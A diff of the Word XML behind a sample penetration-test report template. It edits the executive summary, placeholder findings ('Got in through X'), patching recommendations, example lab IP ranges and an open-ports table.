-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>. John</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>’s overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network. When performing the attacks, John was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.  During the testing, John had administrative level access to multiple systems. All systems were successfully </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>exploited</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and access granted. These systems as well as a brief description on how access was obtained are listed below:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-          <w:bar w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Lab Trophy 1 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-          <w:bar w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Lab Trophy 2 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-          <w:bar w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Lab Trophy 3 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-          <w:bar w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exam Trophy 1 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-          <w:bar w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Exam Trophy 2 – Got in through </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>X</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:color="000000"/>
-          <w:lang w:eastAsia="en-ZA"/>
-          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:miter w14:lim="400000"/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-        <w:br w:type="page"/>
+        <w:t xml:space="preserve">John utilized a widely adopted approach to performing penetration testing that is effective in testing </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7891,7 +9355,39 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc59959351"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc59959353"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Sample</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Report </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -7900,115 +9396,20 @@
           <w:u w:color="000000"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>2.1 Sample Report - Recommendations</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
+        <w:t>– Information Gathering</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">John recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>at a later date</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc59959352"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.0 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-        <w:t>– Methodologies</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>John utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how John was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.</w:t>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
+        </w:rPr>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -8022,39 +9423,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc59959353"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Report </w:t>
-      </w:r>
+      <w:bookmarkStart w:id="7" w:name="_Toc59959354"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -8063,7 +9432,8 @@
           <w:u w:color="000000"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>– Information Gathering</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>3.2 Sample Report – Service Enumeration</w:t>
       </w:r>
       <w:bookmarkEnd w:id="7"/>
     </w:p>
@@ -8080,81 +9450,13 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, John was tasked with exploiting the lab and exam network. The specific IP addresses were:</w:t>
+        <w:t xml:space="preserve">The service enumeration portion of a penetration test focuses on gathering information about what </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Lab Network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>192.168.1.1, 192.168.1.2, 192.168.1.3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Exam Network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>172.16.203.133, 172.16.203.134, 172.16.203.135, 172.16.203.136</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8174,7 +9476,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc59959354"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc59959355"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -8184,7 +9486,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>3.2 Sample Report – Service Enumeration</w:t>
+        <w:t>3.3 Sample Report – Penetration</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
     </w:p>
@@ -8194,393 +9496,14 @@
         <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.  In some cases, some ports may not be listed.</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9454" w:type="dxa"/>
-        <w:tblInd w:w="-10" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:insideH w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-        </w:tblBorders>
-        <w:shd w:val="clear" w:color="auto" w:fill="CED7E7"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="4727"/>
-        <w:gridCol w:w="4727"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="454"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="AA0716"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-                <w:color w:val="FFFFFF"/>
-                <w:u w:color="FFFFFF"/>
-              </w:rPr>
-              <w:t>Server IP Address</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="AA0716"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-                <w:color w:val="FFFFFF"/>
-                <w:u w:color="FFFFFF"/>
-              </w:rPr>
-              <w:t>Ports Open</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="454"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>192.168.1.1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>TCP:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 21,22,25,80,443</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="454"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>192.168.1.2</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
